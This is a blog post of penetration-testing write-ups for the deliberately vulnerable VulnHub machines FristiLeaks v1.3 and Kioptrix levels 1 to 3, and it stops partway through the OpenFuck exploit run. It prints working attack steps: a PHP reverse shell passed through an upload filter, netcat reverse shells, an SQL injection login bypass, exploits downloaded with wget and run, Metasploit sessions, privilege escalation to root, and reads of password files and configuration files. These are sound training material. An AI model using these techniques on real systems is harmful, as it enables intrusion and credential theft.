Write-up for FristiLeaks v1.3 [VulnHub]

To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM) like what I did for the Writeup for the Kioptrix series.

It has proved to be an effective exercise because apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques which I learnt previously while studying for my OSCP certification exams. Do read my OSCP/PWK course review if you are intending to take your OSCP certification exams in 2018!

Practice makes perfect
Practice makes perfect

As mentioned previously during my very first VulnHub write-up, the VMs on VulnHub were designed to be vulnerable, specifically created for security researchers or any security enthusiasts to conduct security testing on them. It is a good way to test your technical skills from identifying vulnerabilities when you encounter one, to crafting your own exploits or getting publicly available Proof of Concept (POC) to work.

Setting up

In this write-up, we will be working on the FristiLeaks v1.3. Before we get started, let’s manually modify the VM’s MAC address to 08:00:27:A5:A6:76 as per instructed by the author.

Steps for VMware Workstation users to modify MAC Address
Instructions for VMware Workstation users to modify MAC Address
Written instructions for VMware Workstation users:
  1. Import the OVA
  2. Click on Edit virtual machine settings
  3. Under Hardware tab, click on Network Adapter
  4. On the right section of the window, click on Advanced
  5. In the pop-out window, insert the MAC address which the VM creator has instructed.

That’s it, now you can launch the VM.

FristiLeaks v1.3
FristiLeaks v1.3

Please note that for the sake of writing this article, I have changed my VM’s Network Adapter settings to NAT instead of the default “Bridged“, but there should be no difference for you to keep up with the write-up.

Host discovery

netdiscover -r


Looks like our target has been found to be hosted on Do you find the MAC address familiar in some ways? 08:00:27:a5:a6:76      1      60  PCS Systemtechnik GmbH

Service Discovery 

nmap -sS -Pn -T4 -p-

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08
Nmap scan report for
Host is up (0.00038s latency).
Not shown: 65534 filtered ports
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)


Enumeration – port 80

Interesting, there is only 1 open port.  Let’s scan the port 80 specifically using scripts:

nmap -A -O -p80

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08
Nmap scan report for
Host is up (0.00029s latency).

80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)


Now let’s manually check the web server running on port 80:


For the sake of clarity, you may also want to verify the robots.txt disallowed entries that were identified by nmap. But trust me, nmap’s script is pretty accurate. 🙂


At this point, my thought was — if this is the entry to gain access to the system, then this machine might be a little too simple. It cannot be so simple.


As expected!! All the 3 entries have brought us to the above meme.

Since all the 3 entries were deadends, let’s run our directory buster.


---- Scanning URL: ----
+ (CODE:403|SIZE:210)                                 
+ (CODE:200|SIZE:703)                               
+ (CODE:200|SIZE:62)                                
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

Nothing interesting found except for the directory listing of images:


Only 2 images. Now, on second thoughts, the pink colour keep-calm image seems to be a hint, since it says,


There were pages for Cola, Sisi and Beer. What about Fristi, since it is also a form of drinking beverage?

Let’s visit


Wow. Just, wow. It’s actually there. There is this hidden admin portal with a very badly designed login form which has auto-complete feature being enabled in both input fields. (yeah, including the password).


And there is this guy in the image that is going “Ha Ha” …

Moving on, let’s run the directory buster again.


---- Scanning URL: ----
+ (CODE:200|SIZE:134605)                      
==> DIRECTORY:                                                                                      

---- Entering directory: ----
+ (CODE:200|SIZE:4)  

We found something! BUT it looks like kind of a dead-end… at least for now.


Since there is nothing else here, let’s go back and view the page source of the login page.

As my colleague, Sven, has always told me when we are working on a project — always view the page source, never trust the rendered output.

It’s very well said, as I have found several vulnerabilities on web applications that messed up because some developers did not expect their users to either view the page source on their web browser (e.g. Firefox users can right-click, view page source) or view the HTTP responses directly on a HTTP proxy server.

Back to the write-up — indeed, the page source has several interesting stuff. For example, the meta description content is hilarious:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Also, the TODO comments are very interesting as well:


There are two things that I can infer from reading this TODO list: There are two things that I could infer from reading this TODO list:

  1. “eezeepz” is the name of the developer who created this application.
  2. He is the type who write notes within the application. Assuming he uses “eezeepz” as his username, what could the password be?

Going further down the page source, we can see that there is another chunk of base64 encoded content that was commented.


Well, what could it be? 🙂

To decode the base64 encoded content, I used nano to make the content into a single line. It can be any other tools that you like – I need it to be a single line so I can conveniently use my terminal to run a command to decode it.

base64 -d /tmp/encoded.txt


Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. Seems like it somehow links back to the meta description content of “using base64 encoding for images”.

First, we save it as a PNG file.

base64 -d /tmp/encoded.txt > decoded.png

Next, we render it and see what is in the image. Again, you can use any tools to do this. For me, I like to use feh.

feh decoded.png


Interesting… for some reason, the only correlation of things that I can use for this set of characters is probably someone’s password…

Let’s try the following credentials on the login form:


Bingo!! Finally some progress!


Looks like the only available function is the upload file feature. Now what? let’s conveniently upload a PHP reverse shell!

Gaining Low Privilege Access Shell

Simply modify and use the one from kali. If you are not using kali, you can download the reverse shell source code here, created by pentestmonkey.

cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
vi reverse-shell.php

Make the necessary changes to insert your own local IP address and listening port.


Now setup a netcat listener to catch the connection.

nc -nlvp 8888


Bad news! Only png, jpg, gif are allowed.


Looks like things are not so easy after all.

There are many ways to configure a file upload function. Developers should consider many different things. For instance, to prevent directory traversal, they should use base() or rename the file completely (use microtime() and some random numbers). Also, check the file type and size if there is any limitation to be enforced.

The question now is, did the developer of this application implemented the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the php file, will it be able to bypass the validation filters?

cp reverse-shell.php reverse-shell.php.jpg

Since this is a VulnHub VM, there is no harm in trying things out! We all learn.


Surprisingly (or maybe as expected), IT WORKS!!


As hinted by the output, now is the time to go back to the “dead-end” that we have identified previously and walk the newly discovered path.

Render the following URL in your web browser:

After rendering the page, a reverse shell has been established on your local machine!

root@kali:/tmp# nc -nlvp 8888
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 41116
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

Now you have a low privileged shell as user apache.


Privilege Escalation

As expected of a PHP reverse shell, the display is bad. It will repeat the characters, so the commands in screenshots from this point onwards may not be as accurate as it should be, but I will write the same command in the write-up, so don’t worry about it yeah.


Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I will be digressing too much. Let us go straight into finding the interesting information on this machine!

The first thing you need to know is the environment that you are in.

Run your favourite enumeration scripts, or you can do it manually based on this guide written by g0tmi1k. It has been super useful during my journey towards obtaining OSCP certification.

Kernel information:
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015

Specific release information:
CentOS release 6.7 (Final)

Interesting system users:

Permissions in /home directory:
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 ..
drwx------. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod

Network information 
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0* LISTEN - 
tcp 0 0 ESTABLISHED 3001/sh 
tcp 0 0 :::80 :::* LISTEN - 
tcp 0 0 ::ffff: ::ffff: ESTABLISHED -

Software versions
Sudo version:
Sudo version 1.8.6p3

MYSQL version:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1

Apache version:
Server version: Apache/2.2.15 (Unix)
Server built: Aug 24 2015 17:52:49

In the above information, in your opinion, which is the most interesting ones?

For me, I would like to check the user directory:

cd /home
ls *


Notice anything interesting in the output?




Yes, you are probably right — let’s check out the text file at /home/eezeepz/notes.txt

cat /home/eezeepz/notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry


Nice. Now we know that Jerry has put some of the useful binary files in his directory at /home/admin, and we can execute those binaries under his (root) privilege by creating a file called “runthis” in the /tmp/ directory.

Let’s try if we can spawn a reverse shell with root privilege using this cron job!

Set up a listener just like before and create the “runthis” file.


It did not work.

Every minute, the cron job will execute the commands in runthis and update the cronresults file located within /tmp/ directory.

The current results are the following:

command did not start with /home/admin or /usr/bin

As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method.

Just to test it out, let’s try running the following command to verify that the cronjob is working fine:

/home/admin/chmod 777 /home/admin


So apparently, it works!

total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

Awesome! Now we can read the content in the /home/admin directory.

bash-4.1$ ls -l

total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt

Here are some interesting files that can be identified in the /home/admin directory:

  1. cryptpass.py
  2. cryptedpass.txt
  3. whoisyourgodnow.txt

First, the content of cryptpass.py:

bash-4.1$ cat cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

print cryptoResult

Next, the content of cryptedpass.txt:

bash-4.1$ cat cryptedpass.txt

Lastly, the content of whoisyourgodnow.txt:

bash-4.1$ cat whoisyourgodnow.txt

It is not difficult to guess that the python script was used to produce the content in cryptedpass.txt and most likely also the whoisyourgodnow.txt.

Based on the source code of cryptpass.py, I wrote a decode function to do the reverse of cryptpass.py, let’s call it decryptpass.py and here’s the full source code:

By the way, I wrote the script locally before transferring it over using wget. Please feel free to write it directly on the machine to your liking!

After executing the commands, you will get 2 sets of passwords for each of the “encrypted” text from before.

  1. mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123
  2. =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi!


I am very sure that LetThereBeFristi! is the password for user “fristigod”.

Let’s continue our privilege escalation, this time to “fristigod” since it is the only folder within the /home directory that we do not currently have any access to until now.

Something inside there might give us root access.

Run the following command to switch user to fristigod:

su - fristigod

standard in must be a tty

This happens because this is not a full shell. To resolve this issue, simply spawn a tty yourself (straightforward enough).

python -c 'import pty;pty.spawn("/bin/bash")'
su - fristigod

Password: LetThereBeFristi!

uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Nice, we are now user “fristigod”!

Once again, check our home directory:


ls -la

total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

Noticed something interesting?

There is a directory named .secret_admin_stuff

cd .secret_admin_stuff
ls -la

total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom


Nice try, but wrong user ;)

As kindly hinted by the error message, I might be using the binary file in a wrong way.

Let’s try to find out more about the usage of this doCom, as this is most likely the gateway to make us root. It can already run programs as root (see its permissions!).

Reviewing the /var/fristigod/.bash_history file to find clues on how to use the doCom file.

cat .bash_history

ls -lah
cd .secret_admin_stuff/
./doCom test
sudo ls
cd .secret_admin_stuff/
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
ls -lah
usermod -G fristigod fristi
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e

Did you notice that the “fristigod” user is always running the following sudo command?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Seems like we have to run that same command as well, before we can attempt to execute any other commands.

To verify this, simply run the following command:

sudo -l

User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Looks like we are right. 🙂


Let’s try it out:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Wow, that was amazing. So, what else can I run?

If I can run the id command like above, can I directly spawn myself a shell?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Perfect! Now we can go to the /root directory to check out the flag 🙂

cd /root
ls -la

-rw-------. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt

Ain’t you excited? 🙂

cat fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

That’s it! Congratulations, you have completed the FristiLeaks v1.3 VulnHub VM!


Thanks for following my write-up, I hope that it has been useful to you and helped you learn something new — be it the thought process or the approach towards hacking a box like this.

Also, I would say that this a very good practice machine for folks who intended to take up the OSCP certification. If you are still on the verge of deciding, check out my OSCP/PWK course review, it might be helpful to you. 😉

Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload such CTF alike practice VMs for the community.

If you like this write-up, do also check out my other write-ups on the Kioptrix series as well.


Write-up for Kioptrix Virtual Machines from Vulnhub


I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs.

For your convenience, the following are the 5 writeups on Kioptrix machines,


Write-up for Kioptrix: Level 1.2 (#3)

This is a continuation of the Kioptrix series writeup, level 1.2, Virtual Machine (VM) number 3.

Add target server to list of hosts


First of all, let’s modify your hosts file as per instructed by the creator on the website Kioptrix level 1.2 (#3) on Vulnhub, or simply refer to the above screenshot.

We should edit the host file to point the target server to kioptrix3.com. Below is the snippet, I modified it slightly,

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

  • Under Windows, edit C:\Windows\System32\drivers\etc\hosts
  • Under Linux, edit /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this

Perform network discovery on your network to find the host
> nmap -Pn

Nmap scan report for kioptrix3.com (
Host is up (0.00040s latency).
Not shown: 998 closed ports
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:D1:8E:A1 (VMware)

Run Directory Buster
> dirb

—- Scanning URL: —-
+ (CODE:403|SIZE:326)
+ (CODE:200|SIZE:23126)
+ (CODE:200|SIZE:1819)

I must say that we have found some interesting sites. Both the modules and phpmyadmin page seems to give us quite a bit of information on its version.



Now back to normal navigation, they have a normal index page as shown below, and it has links for admin login page.



Oh, check this out, they uses LotusCMS.

Google for LotusCMS vulnerability

Found an exploitation script, let’s download it
> wget ‘https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh’

Setup listener on your attacker machine
> nc -lvp 6666

Run the exploit
> ./lotusRCE.sh

Path found, now to check for vuln….

Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell….
what IP to use?
What PORT?

OK, open your local listener and choose the method for back connect:

1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

There you go, your listener should have received a reverse shell now.

connect to [] from kioptrix3.com [] 57841

Check your id 
> id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Good, now you have a limited shell as user www-data.

Dump the list of users and see their home directory
> cat /etc/passwd

list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Check out the non-standard users, such as loneferret
> cd /home/loneferret/
> ls -l

total 32
-rw-r–r– 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh

View the CompanyPolicy file
> cat CompanyPolicy.README

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command ‘sudo ht’.
Failure to do so will result in you immediate termination.


Nothing interesting. Now, back to the starting page,
> cd /home/www/kioptrix3.com
> ls


Perform a search on any PHP files which contains “config” in the file name, maybe we can get some interesting hardcoded information from them
> find . -name ‘*.php’ | grep config


View the configuration file
> cat ./gallery/gconfig.php

[ … omitted]
$GLOBALS[“gallarific_path”] = “http://kioptrix3.com/gallery&#8221;;
$GLOBALS[“gallarific_mysql_server”] = “localhost”;
$GLOBALS[“gallarific_mysql_database”] = “gallery”;
$GLOBALS[“gallarific_mysql_username”] = “root”;
$GLOBALS[“gallarific_mysql_password”] = “fuckeyou”;
[ … omitted]

We have gotten a sql login credentials, nice. The other file “./data/config/index.php” is empty though.

The credentials are legit, login success at phpmyadmin!


Now is time to use some of your favorite password decrypt website or tools. Once you are done, you will find out that the following are the passwords,

dreg: Mast3r
loneferret: starwars

Login to the server via SSH (remember that now, you are ‘new employees’ as mentioned in the company policy just now)
> ssh dreg@
> sudo -l

[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.

No luck. Let’s try the other user.

> ssh loneferret@
> sudo -l

User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

Great. loneferret is allowed to run HT Editor as sudo!

Run the HT Editor as sudo
> /usr/local/bin/ht

From here, we follow the instructions to open the /etc/sudoer file to make modification so we can run other programs as sudo
* Press F3 to open file


Enter file name to open (reference as above)
> /etc/sudoers


Add the following line in the privilege specification (reference as above)
> /bin/bash
* Press F2 to save

Now run the following to gain root access
> sudo /bin/bash
> id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now root!


Write-up for Kioptrix: Level 1.1 (#2)

This is a continuation from the Kioptrix Virtual Machines (VM) on VulnHub.

Click to view Writeup for Kioptrix level 1 (#1) VM.


Let’s get started!

Scan the network using nmap to discover hosts
> nmap -sS -T5

Nmap scan report for

Host is up (0.00018s latency).

Not shown: 994 closed ports


22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

443/tcp  open  https

631/tcp  open  ipp

3306/tcp open  mysql

MAC Address: 00:0C:29:A1:02:89 (VMware)

Navigate to the website using a browser (port 80) 


Wow, there is a login page. Let’s test for SQL Injection vulnerability

Enter the following input as the username (take note of the space behind):

‘ or 1=1 — 

And we are in!

lvl-2-002pngNow let’s try the options and see if they works.


Well, it works!

Setup netcat listener on your machine, port 6666
> nc -lvp 6666


Perform netcat connectivity on target machine and spawn a reverse shell (refer to above image); /usr/local/bin/nc 6666 -e /bin/sh

Observe the terminal which you are running the netcat listener

root@kali:~/Desktop/kioptrix# nc -lvp 6666
listening on [any] 6666 … inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 32771
uid=48(apache) gid=48(apache) groups=48(apache)

Now you have a shell as user apache.

Check systme kernel version
> uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Google for vulnerability on “Linux kernel 2.6.9-55”

Check out : CVE-2009-2698, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

Download the exploit code to your machine
> cd /tmp
> wget ‘https://www.exploit-db.com/download/9542&#8217;

Transfer the exploit code to the target machine
> service apache2 start
> cd /var/www/html/
> mv ~/Desktop/kioptrix/9542.c .

Download the file from target machine
> wget ‘;

=> `9542.c’
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 280.27 MB/s

23:44:28 (280.27 MB/s) – `9542.c’ saved [2645/2645]

The download is a successful.

Compile your exploit on target machine
> gcc 9542.c
> ls


Run your exploit to get root
> ./a.out

sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Congrats, you have gotten root.


Write-up for Kioptrix: Level 1 (#1)

I came across the Kioptrix Virtual Machines (VM) on VulnHub today and find them pretty interesting. Hence, I attempted some penetration tests on the Kioptrix: Level 1 (#1) and managed to get root (the objective of the game).

A quick background on the VMs found on VulnHub – they are basically VMs which are vulnerable by design – specially created for security researchers or any security enthusiasts (like myself) to perform security testing on them, or to try out known exploits as a form of Proof of Concept (POC).


I found 2 methods of getting root, one requires some modification to a readily obtained exploit code, while the other one uses the Metasploit tool to automatically get root using a generated payload.

Let’s get started. Before we go into either methods, we need to perform some general reconnaissance to understand what services are there.

Note #1: section description are in bold
Note #2: commands are in Italic form
Note #3: output are in block quote (just like this box)
Note #4: output are trimmed if they are too long.. this is to avoid confusing you with output that are way too long 🙂

Perform an nmap scan to discover target’s open ports & IP address
> nmap -sS -Pn -T5

Nmap scan report for
Host is up (0.00065s latency).
Not shown: 994 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:3C:27:52 (VMware)

[[[ Method 1 ]]]

Scan for existing SMB services (since port 139 is currently open)
> nbtscan

Doing NBT name scan for addresses from

IP address NetBIOS Name Server User MAC address 
------------------------------------------------------------------------------ KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

Perform SMB enumeration (as shown above, there is SMB service on the host)
> enum4linux -a

| OS information on |
[+] Got OS info for from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for from srvinfo:
 KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
 platform_id : 500
 os version : 4.5
 server type : 0x9a03

Google for known vulnerability.

As obvious as it seems to be, yes, we should Google for known vulnerability. As shown in the output, the target system is using Samba 2.2.1a. We will Google for “samba version 2.2.1a vulnerability”

Check out CVE-2003-0201,Samba ‘call_trans2open’  Remote Buffer Overflow vulnerability.


Now, we can simply launch Metasploit to do the job for you.

msf > msfconsole
msf > search 2003-0201
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set rhost
msf exploit(trans2open) > set payload generic/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 
[*] - Trying return address 0xbffffdfc...
[*] - Trying return address 0xbffffcfc...
[*] - Trying return address 0xbffffbfc...
[*] - Trying return address 0xbffffafc...
[*] - Trying return address 0xbffff9fc...
[*] - Trying return address 0xbffff8fc...
[*] Command shell session 1 opened ( -> at 2016-10-24 11:06:50 -0400
[*] Command shell session 2 opened ( -> at 2016-10-24 11:06:51 -0400

uid=0(root) gid=0(root) groups=99(nobody)

[[[ Method 2 ]]]

Scan for vulnerability using Nikto
> nikto -h

+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Google for known vulnerability.

Once again, we should Google for known vulnerability. As shown in the output, the target system is using a very outdated Apache web server version 1.3.20. We will Google for “apache 1.3.20 vulnerability”

Check out the Apache mod_ssl (< 2.8.7) OpenSSL – ‘OpenFuckV2.c’ Remote Exploit (2)

Search for the exploit via searchsploit
> searchsploit OpenFuck

-------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms)
-------------------------------------------------- ----------------------------------
Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' | ./unix/remote/764.c
Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' R | ./unix/remote/21671.c
-------------------------------------------------- ----------------------------------

Modify the exploit code

Now, simply make a copy of the 764.c exploit and put it somewhere to check it out and make changes to it (because the ‘off-the-shell’ code over there is pretty outdated)
> cp /usr/share/exploitdb/platforms/unix/remote/764.c OpenFuck.c

Here, we need to make some modification to the code before compiling it. you can do it using any text editor. i like to use VIM so I will be running the following command.
> vim OpenFuck.c

From this part onwards, I need you to follow closely. I try to be as clear as possible – if you still got lost along the way, please feel free to leave a comment to clarify.

Below are the list of changes which are need to be made to the OpenFuck.c code,

  1. Include the openssl rc4 and md5 libraries
    • #include <openssl/rc4.h>
    • #include <openssl/md5.h>
  2. Modify the ‘wget’ method in the exploit itself because the url does not exist anymore. we need to update it to become the new URL to download the file.
  3. Search for ‘wget’, and then replace the URL to http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Install Libraries for compiling the modified exploit code

Now we need to install the ssl-dev library into our server or else we will face difficulty compiling the code.
> apt-get install libssl-dev
> gcc -o OpenFuck OpenFuck.c -lcrypto

OpenFuck.c: In function ‘get_server_hello’:
OpenFuck.c:1011:26: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [-Wincompatible-pointer-types]
In file included from /usr/include/openssl/objects.h:965:0,
 from /usr/include/openssl/evp.h:94,
 from /usr/include/openssl/x509.h:73,
 from /usr/include/openssl/ssl.h:156,
 from OpenFuck.c:20:
/usr/include/openssl/x509.h:823:1: note: expected ‘const unsigned char ’ but argument is of type ‘unsigned char ’

Now, you are done with the mod_ssl exploit!

Running the Exploit

Simply run the compiled file to view its usages,
> ./OpenFuck

: Usage: ./OpenFuck target box [port] [-c N]

target - supported box eg: 0x00
 box - hostname or IP address
 port - port for ssl connection
 -c open N connections. (use range 40-50 if u dont know)

Supported OffSet:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

Of course, we are only interested in the following 2 types which are designed for Red Hat Linux, using apache version 1.3.20.

Trying out using the 0x6a option ….
> ./OpenFuck 0x6a 443 -c 40

* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

It doesn’t work. next we try the other option,

> ./OpenFuck 0x6b 443 -c 40

* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
